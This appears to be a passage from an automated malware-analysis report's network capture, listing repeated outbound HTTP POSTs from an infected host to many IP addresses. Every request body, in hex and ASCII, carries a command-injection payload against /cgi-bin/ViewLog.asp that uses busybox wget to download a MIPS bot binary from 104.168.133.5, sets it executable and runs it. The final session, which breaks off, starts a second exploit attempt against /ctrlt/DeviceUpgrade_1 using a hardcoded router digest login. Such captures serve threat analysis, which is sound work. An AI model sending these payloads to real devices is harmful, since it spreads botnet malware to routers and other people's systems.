                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.710205078 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:16.742275953 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              616192.168.2.135645462.29.126.2328080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:55.573714018 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              617192.168.2.134790494.120.210.1618080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:55.592776060 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              618192.168.2.135421895.86.69.1238080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:55.602030039 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              619192.168.2.134631094.120.40.818080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:55.605712891 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              620192.168.2.135971485.83.242.1788080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:55.754391909 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:55.965770960 CET230INHTTP/1.1 301 Moved Permanently
                                              Location: /2.0/gui/?item=cgi-bin/ViewLog.asp
                                              Content-Length: 0
                                              Connection: close
                                              Date: Thu, 23 Nov 2023 04:17:42 GMT
                                              Server: HTTP Server


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              621192.168.2.133671894.120.240.1818080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:55.816390991 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              622192.168.2.135241262.29.88.1828080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:55.855551004 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              623192.168.2.134267662.210.110.158080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:56.259107113 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:56.434242964 CET360INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 23 Nov 2023 04:17:56 GMT
                                              Content-Type: text/html
                                              Content-Length: 146
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              624192.168.2.133543094.120.109.1518080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:56.496582031 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              625192.168.2.133640294.121.177.208080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:56.720732927 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              626192.168.2.135062294.236.167.138080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:56.805613995 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              627192.168.2.134870494.120.247.768080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:56.939621925 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              628192.168.2.136060085.209.139.2328080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:56.942919016 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:57.165302992 CET1340INHTTP/1.0 400 Bad Request
                                              Server: squid/3.1.23
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 03:54:09 GMT
                                              Content-Type: text/html
                                              Content-Length: 3167
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              629192.168.2.135569694.123.252.1838080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:56.945280075 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              630192.168.2.135974062.29.90.608080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:56.951590061 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              631192.168.2.135197241.233.241.16137215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:57.446085930 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
